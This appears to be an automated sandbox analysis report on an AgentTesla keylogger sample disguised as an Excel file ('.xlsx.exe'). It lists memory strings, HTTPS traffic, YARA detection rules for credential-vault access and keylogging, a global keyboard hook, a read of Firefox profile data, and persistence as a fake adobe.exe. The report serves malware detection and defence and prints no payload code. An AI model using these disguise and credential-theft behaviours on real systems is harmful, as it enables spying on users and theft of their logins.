Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49746 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, JovGVW.cs	.Net Code: _5PXjwm
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, JovGVW.cs	.Net Code: _5PXjwm

Installs a global keyboard hook

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_08383350	0_2_08383350
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_08383788	0_2_08383788
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_083827F0	0_2_083827F0
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_08383BC0	0_2_08383BC0
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_030DDFAC	0_2_030DDFAC
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_07E430F8	0_2_07E430F8
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_07E42E87	0_2_07E42E87
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_07E42E98	0_2_07E42E98
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_07E4B518	0_2_07E4B518
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_07E430E7	0_2_07E430E7
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_00D0B397	2_2_00D0B397
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_00D04A90	2_2_00D04A90
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_00D03E78	2_2_00D03E78
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_00D041C0	2_2_00D041C0
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_06371BB7	2_2_06371BB7
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063728A8	2_2_063728A8
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_0637289A	2_2_0637289A
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_06373592	2_2_06373592
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D3018	2_2_063D3018
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063DC0F8	2_2_063DC0F8
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D6160	2_2_063D6160
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D5150	2_2_063D5150
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063DCEC8	2_2_063DCEC8
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063DAD90	2_2_063DAD90
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D78F8	2_2_063D78F8
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D7218	2_2_063D7218
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063DE328	2_2_063DE328
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D2340	2_2_063D2340
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D0040	2_2_063D0040
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D584F	2_2_063D584F
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063DC990	2_2_063DC990
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_063D0006	2_2_063D0006
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_011CDFAC	3_2_011CDFAC
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_070B9F30	3_2_070B9F30
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_070B3788	3_2_070B3788
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_070B27F0	3_2_070B27F0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_070B5CA0	3_2_070B5CA0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_070B3342	3_2_070B3342
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_070B3350	3_2_070B3350
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_070B53C8	3_2_070B53C8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_070B3BC0	3_2_070B3BC0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_08AA30F8	3_2_08AA30F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_08AA30EF	3_2_08AA30EF
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_08AAB4E0	3_2_08AAB4E0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_08AAB508	3_2_08AAB508
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_08AAB518	3_2_08AAB518
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_08AA2E8F	3_2_08AA2E8F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_08AA2E98	3_2_08AA2E98
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_016CE8A8	4_2_016CE8A8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_016C4A90	4_2_016C4A90
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_016CADA8	4_2_016CADA8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_016C3E78	4_2_016C3E78
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_016C41C0	4_2_016C41C0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DE079C	4_2_06DE079C
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DE2008	4_2_06DE2008
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DE2003	4_2_06DE2003
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DE2CFE	4_2_06DE2CFE
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DF2750	4_2_06DF2750
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DF5550	4_2_06DF5550
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DF6560	4_2_06DF6560
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DFC0F8	4_2_06DFC0F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DFB1A8	4_2_06DFB1A8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DF7CF8	4_2_06DF7CF8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DF7618	4_2_06DF7618
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DFE328	4_2_06DFE328
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DF0040	4_2_06DF0040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DF5C60	4_2_06DF5C60
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 4_2_06DF0007	4_2_06DF0007
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_050ADFAC	6_2_050ADFAC
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05CA7D70	6_2_05CA7D70
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05CA0040	6_2_05CA0040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05CA001D	6_2_05CA001D
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05CA7D60	6_2_05CA7D60
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05FA30F8	6_2_05FA30F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05FAB518	6_2_05FAB518
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05FAB508	6_2_05FAB508
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05FAB4E0	6_2_05FAB4E0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05FA2E98	6_2_05FA2E98
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05FA2E87	6_2_05FA2E87
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_05FA30E7	6_2_05FA30E7
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_07469F30	6_2_07469F30
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_074627F0	6_2_074627F0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_07463788	6_2_07463788
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_07465CA0	6_2_07465CA0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_07463350	6_2_07463350
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_07463BC0	6_2_07463BC0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_074653C8	6_2_074653C8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 6_2_074632FF	6_2_074632FF
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_012A4A90	7_2_012A4A90
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_012A3E78	7_2_012A3E78
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_012A41C0	7_2_012A41C0
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06951734	7_2_06951734
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06952462	7_2_06952462
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06952468	7_2_06952468
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0695315E	7_2_0695315E
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06963418	7_2_06963418
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06965550	7_2_06965550
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06966560	7_2_06966560
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0696C0F8	7_2_0696C0F8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0696B198	7_2_0696B198
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06967CF8	7_2_06967CF8
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06967618	7_2_06967618
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06962742	7_2_06962742
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0696E328	7_2_0696E328
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06960040	7_2_06960040
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06965C4F	7_2_06965C4F
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_06960006	7_2_06960006
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 7_2_0696003E	7_2_0696003E

Source: BL NBNSA240600050.xlsx.exe	Binary or memory string: OriginalFilename vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1669970757.000000000145E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000000.1648080040.0000000000FF8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamethQh.exeT vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4111970211.00000000008F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs BL NBNSA240600050.xlsx.exe
Source: BL NBNSA240600050.xlsx.exe	Binary or memory string: OriginalFilenamethQh.exeT vs BL NBNSA240600050.xlsx.exe

Source: BL NBNSA240600050.xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: BL NBNSA240600050.xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, yNzg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, KNymkUU5gB.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, KNymkUU5gB.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, LPE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, LPE.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.cs	Security API names: _0020.SetAccessControl
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.cs	Security API names: _0020.AddAccessRule
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, mdGCiWky1rqgK3BVbJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.BL NBNSA240600050.xlsx.exe.3365b5c.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.BL NBNSA240600050.xlsx.exe.7ea0000.8.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.BL NBNSA240600050.xlsx.exe.3345460.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/4@2/2

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BL NBNSA240600050.xlsx.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: BL NBNSA240600050.xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: BL NBNSA240600050.xlsx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BL NBNSA240600050.xlsx.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

File read: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process created: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process created: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior
